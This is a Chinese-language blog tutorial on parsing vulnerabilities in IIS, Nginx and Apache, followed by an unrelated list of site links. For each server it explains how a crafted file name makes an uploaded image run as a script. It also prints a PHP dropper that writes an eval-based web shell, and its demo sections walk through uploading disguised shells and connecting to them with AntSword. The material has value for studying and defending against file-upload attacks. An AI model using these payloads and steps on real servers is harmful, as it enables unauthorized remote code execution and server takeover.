中间件的解析漏洞详解及演示
本文转自行云博客https://www.xy586.top/
文章目录
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
类型:
- IIS 5.x/6.0解析漏洞
- IIS 7.0/IIS 7.5/
- Nginx <0.8.3畸形解析漏洞
- Nginx <8.03 空字节代码执行漏洞
- Apache解析漏洞
IIS5.x-6.x解析漏洞
利用方法
IIS6.0 默认的可执行文件除了asp还包含这三种 /sp.asa /sp.cer /sp.cdx 1.目录解析 /xx.asp/xx.jpg 2.文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg 将被当作asp文件来执行。假设黑客可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 第二种,在IIS6.0下,分号后面的不被解析,也就是说 sp.asp;.jpg 会被服务器看成是sp.asp
Apache
漏洞原理
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 sec.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把sec.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个sec.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀
其余配置问题导致漏洞
(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。 (2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。
IIS 7.0/IIS 7.5/nginx 0.8.3解析漏洞
在默认Fast-CGI开启状况下,黑客上传一个名字为sp.jpg,内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
的文件,然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php
Nginx <0.8.03 空字节代码执行漏洞
影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 Nginx在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php 来执行其中的代码
演示
IIS6.0解析漏洞
1.上传23.asa;jpg文件
蚁剑连接成功
2.将23.asa;jpg文件改名为23.jpg,并放到1.asp目录下访问,然后使用蚁剑连接
Nginx 漏洞
上传一个图片马,里面含有代码
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
该木马会在上传后,运用Apache的解析漏洞再次访问时生成一个shell.php木马
访问该图片,并在末尾加上/.php
生成shell.php
蚁剑去连接该shell.php
Apache解析漏洞
上传带一句话木马的1.php.q.w.d文件
蚁剑连接
- Shiro眼皮下玩ajax,玩出302 Found
- 对于JSONObject,我只是临时抱佛脚
- 总结切面编程AOP的注解式开发和XML式开发
- SpringMVC注解@RequestMapping之produces属性导致的406错误
- SpringBoot集成MyBatis的分页插件PageHelper(回头草)
- SpringBoot整合Mybatis之进门篇
- Tomcat和Java Virtual Machine的性能调优总结
- 一次浴火重生的MySQL优化(EXPLAIN命令详解)
- 简单聊聊不可或缺的Nginx反向代理服务器--实现负载均衡【上篇】
- Java设计模式之适配器设计模式(项目升级案例)
- Java设计模式之模板方法设计模式(银行计息案例)
- 多线程之策略模式
- 文件上传的动作不能太俗,必须页面无刷新上传
- 这次真的忽略了一些ActiveMQ内心的娇艳
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法